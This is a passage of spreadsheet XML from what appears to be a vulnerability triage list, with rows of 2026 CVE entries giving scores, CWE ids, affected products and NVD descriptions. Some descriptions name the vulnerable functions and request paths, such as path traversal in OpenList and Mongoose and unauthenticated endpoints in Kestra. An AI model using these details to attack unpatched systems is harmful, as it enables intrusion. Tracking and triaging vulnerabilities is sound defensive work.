          <t>CVE-2026-72956</t>
        </is>
      </c>
      <c r="C3988" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3988" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3988" s="5" t="inlineStr"/>
      <c r="F3988" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G3988" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3988" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I3988" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3988" s="5" t="inlineStr"/>
      <c r="K3988" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L3988" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3988" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72956</t>
        </is>
      </c>
    </row>
    <row r="3989">
      <c r="A3989" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3989" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72974</t>
        </is>
      </c>
      <c r="C3989" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3989" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3989" s="5" t="inlineStr"/>
      <c r="F3989" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G3989" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3989" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I3989" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3989" s="5" t="inlineStr"/>
      <c r="K3989" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L3989" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Microsoft Office Excel allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3989" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72974</t>
        </is>
      </c>
    </row>
    <row r="3990">
      <c r="A3990" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3990" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72975</t>
        </is>
      </c>
      <c r="C3990" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3990" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3990" s="5" t="inlineStr"/>
      <c r="F3990" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3990" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3990" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="I3990" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3990" s="5" t="inlineStr"/>
      <c r="K3990" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3990" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3990" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72975</t>
        </is>
      </c>
    </row>
    <row r="3991">
      <c r="A3991" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3991" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72977</t>
        </is>
      </c>
      <c r="C3991" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3991" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3991" s="5" t="inlineStr"/>
      <c r="F3991" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G3991" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3991" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="I3991" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3991" s="5" t="inlineStr"/>
      <c r="K3991" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="L3991" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3991" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72977</t>
        </is>
      </c>
    </row>
    <row r="3992">
      <c r="A3992" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3992" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73029</t>
        </is>
      </c>
      <c r="C3992" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3992" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3992" s="5" t="inlineStr"/>
      <c r="F3992" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3992" s="5" t="inlineStr"/>
      <c r="H3992" s="5" t="inlineStr"/>
      <c r="I3992" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3992" s="5" t="inlineStr"/>
      <c r="K3992" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L3992" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3992" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73029</t>
        </is>
      </c>
    </row>
    <row r="3993">
      <c r="A3993" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3993" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73216</t>
        </is>
      </c>
      <c r="C3993" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3993" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3993" s="5" t="inlineStr"/>
      <c r="F3993" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3993" s="5" t="inlineStr"/>
      <c r="H3993" s="5" t="inlineStr"/>
      <c r="I3993" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3993" s="5" t="inlineStr"/>
      <c r="K3993" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L3993" s="5" t="inlineStr">
        <is>
          <t>Coturn is a free open source implementation of TURN and STUN Server. Prior to 4.17.0, shutdown_client_connection() in src/server/ns_turn_server.c prematurely calls dec_quota() and releases bandwidth accounting during the first-stage close of a mobility-enabled allocation while preserving the allocation, relay socket, session, and mobility ticket, allowing an authenticated client to bypass --user-quota and --total-quota and exhaust relay ports. This issue is fixed in version 4.17.0.</t>
        </is>
      </c>
      <c r="M3993" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73216</t>
        </is>
      </c>
    </row>
    <row r="3994">
      <c r="A3994" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3994" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73245</t>
        </is>
      </c>
      <c r="C3994" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3994" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3994" s="5" t="inlineStr"/>
      <c r="F3994" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3994" s="5" t="inlineStr"/>
      <c r="H3994" s="5" t="inlineStr"/>
      <c r="I3994" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3994" s="5" t="inlineStr"/>
      <c r="K3994" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L3994" s="5" t="inlineStr">
        <is>
          <t>Kestra is an open-source, event-driven orchestration platform. Prior to 2.0.0-rc6, Kestra's cli/src/main/resources/application.yml serves Micronaut management endpoints on port 8081 without authentication even when Basic Auth protects /api/v1/** on port 8080, allowing unauthenticated GET /env requests to disclose resolved configuration and POST /loggers/{name} requests to change runtime log levels. This issue is fixed in 2.0.0-rc6.</t>
        </is>
      </c>
      <c r="M3994" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73245</t>
        </is>
      </c>
    </row>
    <row r="3995">
      <c r="A3995" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3995" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73255</t>
        </is>
      </c>
      <c r="C3995" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3995" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3995" s="5" t="inlineStr"/>
      <c r="F3995" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3995" s="5" t="inlineStr"/>
      <c r="H3995" s="5" t="inlineStr"/>
      <c r="I3995" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J3995" s="5" t="inlineStr"/>
      <c r="K3995" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3995" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Prior to 7.22, an attacker who can control an SSI-enabled file can place directory traversal sequences in an #include file or #include virtual directive. The mg_ssi() function in src/ssi.c concatenates the directive argument into a filesystem path without calling mg_path_is_sane(), allowing an MG_ENABLE_SSI deployment with ssi_pattern configured to disclose files readable by the Mongoose process. This issue is fixed in version 7.22.</t>
        </is>
      </c>
      <c r="M3995" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73255</t>
        </is>
      </c>
    </row>
    <row r="3996">
      <c r="A3996" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3996" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73258</t>
        </is>
      </c>
      <c r="C3996" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3996" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3996" s="5" t="inlineStr"/>
      <c r="F3996" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3996" s="5" t="inlineStr"/>
      <c r="H3996" s="5" t="inlineStr"/>
      <c r="I3996" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J3996" s="5" t="inlineStr"/>
      <c r="K3996" s="5" t="inlineStr">
        <is>
          <t>CWE-697</t>
        </is>
      </c>
      <c r="L3996" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Prior to 7.22, a remote attacker can place a lone carriage return or line feed in multipart input processed by mg_http_next_multipart() in src/http.c. The loops comparing s[b] and s[b + 1], and s[h2] and s[h2 + 1], use an incorrect AND condition and stop when either character resembles part of a CRLF terminator. This truncates headers, filenames, or boundaries and can cause an application to accept dangerous content after seeing a misleading Content-Type value. This issue is fixed in version 7.22.</t>
        </is>
      </c>
      <c r="M3996" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73258</t>
        </is>
      </c>
    </row>
    <row r="3997">
      <c r="A3997" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3997" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73265</t>
        </is>
      </c>
      <c r="C3997" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3997" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3997" s="5" t="inlineStr"/>
      <c r="F3997" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3997" s="5" t="inlineStr"/>
      <c r="H3997" s="5" t="inlineStr"/>
      <c r="I3997" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J3997" s="5" t="inlineStr"/>
      <c r="K3997" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="L3997" s="5" t="inlineStr">
        <is>
          <t>RustFS is a distributed object storage system built in Rust. RustFS authorizes explicit versionId reads in GetObject, CopyObject sources, and UploadPartCopy sources with s3:GetObject instead of s3:GetObjectVersion, allowing principals without historical-version permission to disclose known historical object content. This issue is fixed in version 1.0.0-beta.11.</t>
        </is>
      </c>
      <c r="M3997" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73265</t>
        </is>
      </c>
    </row>
    <row r="3998">
      <c r="A3998" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3998" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73424</t>
        </is>
      </c>
      <c r="C3998" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3998" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3998" s="5" t="inlineStr"/>
      <c r="F3998" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3998" s="5" t="inlineStr"/>
      <c r="H3998" s="5" t="inlineStr"/>
      <c r="I3998" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J3998" s="5" t="inlineStr"/>
      <c r="K3998" s="5" t="inlineStr">
        <is>
          <t>CWE-441, CWE-862</t>
        </is>
      </c>
      <c r="L3998" s="5" t="inlineStr">
        <is>
          <t>Astro is a web framework for content-driven websites. From 10.0.3 until 11.0.3, the Astro Vercel adapter in packages/integrations/vercel/src/serverless/entrypoint.ts accepts x_astro_path for the public /_isr function based only on the x-vercel-isr header, allowing unauthenticated GET requests to render routes protected only by Vercel edge path rules or split edge middleware. This issue is fixed in 11.0.3.</t>
        </is>
      </c>
      <c r="M3998" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73424</t>
        </is>
      </c>
    </row>
    <row r="3999">
      <c r="A3999" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3999" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73559</t>
        </is>
      </c>
      <c r="C3999" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3999" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3999" s="5" t="inlineStr"/>
      <c r="F3999" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3999" s="5" t="inlineStr"/>
      <c r="H3999" s="5" t="inlineStr"/>
      <c r="I3999" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3999" s="5" t="inlineStr"/>
      <c r="K3999" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L3999" s="5" t="inlineStr">
        <is>
          <t>vLLM is an inference and serving engine for large language models. From 0.19.0 until 0.26.0, the /v1/completions CompletionRequest.prompt field in vllm/entrypoints/openai/completion/protocol.py accepts an unbounded list[str] or list[list[int]], prompt_to_seq() in vllm/renderers/inputs/preprocess.py and OnlineRenderer.preprocess_completion() in vllm/renderers/online_renderer.py expand every element, and vllm/entrypoints/openai/completion/serving.py creates one engine generator and response slot per prompt, allowing an authenticated API client to exhaust CPU, memory, async scheduling capacity, engine request slots, and response buffering with one request. This issue is fixed in version 0.26.0.</t>
        </is>
      </c>
      <c r="M3999" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73559</t>
        </is>
      </c>
    </row>
    <row r="4000">
      <c r="A4000" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4000" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73788</t>
        </is>
      </c>
      <c r="C4000" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4000" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4000" s="5" t="inlineStr"/>
      <c r="F4000" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4000" s="5" t="inlineStr"/>
      <c r="H4000" s="5" t="inlineStr"/>
      <c r="I4000" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4000" s="5" t="inlineStr"/>
      <c r="K4000" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L4000" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the ClearPass OnGuard agent could allow an authenticated remote attacker to elevate their own privileges on a vulnerable ClearPass OnGuard deployment. Successful exploitation could allow an attacker to obtain root privileges, leading to potentially unauthorized operation of the vulnerable system.</t>
        </is>
      </c>
      <c r="M4000" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73788</t>
        </is>
      </c>
    </row>
    <row r="4001">
      <c r="A4001" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4001" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75162</t>
        </is>
      </c>
      <c r="C4001" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4001" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4001" s="5" t="inlineStr"/>
      <c r="F4001" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4001" s="5" t="inlineStr"/>
      <c r="H4001" s="5" t="inlineStr"/>
      <c r="I4001" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4001" s="5" t="inlineStr"/>
      <c r="K4001" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L4001" s="5" t="inlineStr">
        <is>
          <t>An information disclosure vulnerability in the opcua-configuration method of /cgi-bin/wwwugw.cgi in MBS-Solutions X-Serie Gateway firmware V6_00_05 allows any remote authenticated user, including users with the low-privileged Standard role, to retrieve the configured OPC-UA authentication credentials in cleartext via the JSON API response.</t>
        </is>
      </c>
      <c r="M4001" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75162</t>
        </is>
      </c>
    </row>
    <row r="4002">
      <c r="A4002" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4002" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75163</t>
        </is>
      </c>
      <c r="C4002" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4002" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4002" s="5" t="inlineStr"/>
      <c r="F4002" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4002" s="5" t="inlineStr"/>
      <c r="H4002" s="5" t="inlineStr"/>
      <c r="I4002" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4002" s="5" t="inlineStr"/>
      <c r="K4002" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L4002" s="5" t="inlineStr">
        <is>
          <t>An information disclosure vulnerability in the ugw-deviceinfo method of /cgi-bin/wwwugw.cgi in MBS-Solutions X-Serie Gateway firmware V6_00_05 returns detailed system version fields (operatingsystem, gatewayversion) to any authenticated user, including users with the low-privileged Standard role.</t>
        </is>
      </c>
      <c r="M4002" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75163</t>
        </is>
      </c>
    </row>
    <row r="4003">
      <c r="A4003" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4003" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75164</t>
        </is>
      </c>
      <c r="C4003" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4003" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4003" s="5" t="inlineStr"/>
      <c r="F4003" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4003" s="5" t="inlineStr"/>
      <c r="H4003" s="5" t="inlineStr"/>
      <c r="I4003" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4003" s="5" t="inlineStr"/>
      <c r="K4003" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="L4003" s="5" t="inlineStr">
        <is>
          <t>An arbitrary file read vulnerability in /cgi-bin/ugwdownload.cgi of MBS-Solutions X-Serie Gateway firmware V6_00_05 allows a remote authenticated user with the low-privileged Standard role to retrieve arbitrary files from the device filesystem via the file query string parameter.</t>
        </is>
      </c>
      <c r="M4003" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75164</t>
        </is>
      </c>
    </row>
    <row r="4004">
      <c r="A4004" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4004" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75165</t>
        </is>
      </c>
      <c r="C4004" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4004" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4004" s="5" t="inlineStr"/>
      <c r="F4004" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4004" s="5" t="inlineStr"/>
      <c r="H4004" s="5" t="inlineStr"/>
      <c r="I4004" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4004" s="5" t="inlineStr"/>
      <c r="K4004" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L4004" s="5" t="inlineStr">
        <is>
          <t>An issue in /cgi-bin/wwwugw.cgi of MBS-Solutions X-Serie Gateway firmware V6_00_05 allows a remote authenticated user with the low-privileged Standard role to invoke hidden network diagnostic methods (ugw-ping, ugw-traceroute) that are not exposed in the web UI, allowing attackers to obtain sensitive information.</t>
        </is>
      </c>
      <c r="M4004" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75165</t>
        </is>
      </c>
    </row>
    <row r="4005">
      <c r="A4005" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4005" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75370</t>
        </is>
      </c>
      <c r="C4005" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4005" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4005" s="5" t="inlineStr"/>
      <c r="F4005" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4005" s="5" t="inlineStr"/>
      <c r="H4005" s="5" t="inlineStr"/>
      <c r="I4005" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J4005" s="5" t="inlineStr"/>
      <c r="K4005" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4005" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read/write vulnerability in the MessageParser::parseECSSTCHeader component of SpaceDot AcubeSAT OBC software commit eaf90ec allows attackers to cause a Denial of Service (DoS) via supplying a crafted CAN message.</t>
        </is>
      </c>
      <c r="M4005" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75370</t>
        </is>
      </c>
    </row>
    <row r="4006">
      <c r="A4006" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4006" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75466</t>
        </is>
      </c>
      <c r="C4006" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4006" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4006" s="5" t="inlineStr"/>
      <c r="F4006" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4006" s="5" t="inlineStr"/>
      <c r="H4006" s="5" t="inlineStr"/>
      <c r="I4006" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J4006" s="5" t="inlineStr"/>
      <c r="K4006" s="5" t="inlineStr">
        <is>
          <t>CWE-369</t>
        </is>
      </c>
      <c r="L4006" s="5" t="inlineStr">
        <is>
          <t>libjpeg-turbo 3.2.0 contains an integer division-by-zero vulnerability in the PNG loader. When processing a valid indexed-color PNG image with a non-gray palette through tj3LoadImage12() or tj3LoadImage16() using the default pixel format, the application may trigger a division-by-zero in alloc_sarray(), causing a SIGFPE and denial of service.</t>
        </is>
      </c>
      <c r="M4006" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75466</t>
        </is>
      </c>
    </row>
    <row r="4007">
      <c r="A4007" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4007" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75509</t>
        </is>
      </c>
      <c r="C4007" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4007" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4007" s="5" t="inlineStr"/>
      <c r="F4007" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4007" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H4007" s="5" t="inlineStr"/>
      <c r="I4007" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J4007" s="5" t="inlineStr"/>
      <c r="K4007" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-345</t>
        </is>
      </c>
      <c r="L4007" s="5" t="inlineStr">
        <is>
          <t>joserfc is a Python library that provides an implementation of several JSON Object Signing and Encryption (JOSE) standards. Prior to version 1.7.3, JWTClaimsRegistry applies membership matching to list-valued iss and sub claims, allowing an array-valued iss that contains the expected issuer to pass an intended equality check and enabling issuer-validation bypass. This issue is fixed in version 1.7.3.</t>
        </is>
      </c>
      <c r="M4007" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75509</t>
        </is>
      </c>
    </row>
    <row r="4008">
      <c r="A4008" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4008" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75602</t>
        </is>
      </c>
      <c r="C4008" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4008" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4008" s="5" t="inlineStr"/>
      <c r="F4008" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4008" s="5" t="inlineStr"/>
      <c r="H4008" s="5" t="inlineStr"/>
      <c r="I4008" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J4008" s="5" t="inlineStr"/>
      <c r="K4008" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="L4008" s="5" t="inlineStr">
        <is>
          <t>OpenList a file list program that supports multiple storage. Prior to 4.2.3, OpenList's offline-download feature at POST /api/fs/add_offline_download with tool: "SimpleHttp" accepts an attacker-supplied URL and saves its bytes under a per-task temporary directory before transferring them to the user's destination storage. The temporary filename comes from the attacker-controlled Content-Disposition header, is passed from parseFilenameFromContentDisposition in internal/offline_download/http/util.go to filepath.Join(task.TempDir, filename) in SimpleHttp.Run in internal/offline_download/http/client.go, and is opened with os.Create without a containment check. Because filepath.Join cleans .. segments, a non-admin user with PermAddOfflineDownload on any path can traverse out of task.TempDir and create, truncate, or overwrite any file writable by the OpenList process whose parent directory already exists. The server/handles/offline_download.go AddOfflineDownload route uses normal user authentication rather than AuthAdmin, and local-storage destinations fall through tryPutUrl in internal/offline_download/tool/add.go to the vulnerable SimpleHttp.Run path. This issue is fixed in version 4.2.3.</t>
        </is>
      </c>
      <c r="M4008" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75602</t>
        </is>
      </c>
    </row>
    <row r="4009">
      <c r="A4009" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4009" s="5" t="inlineStr">
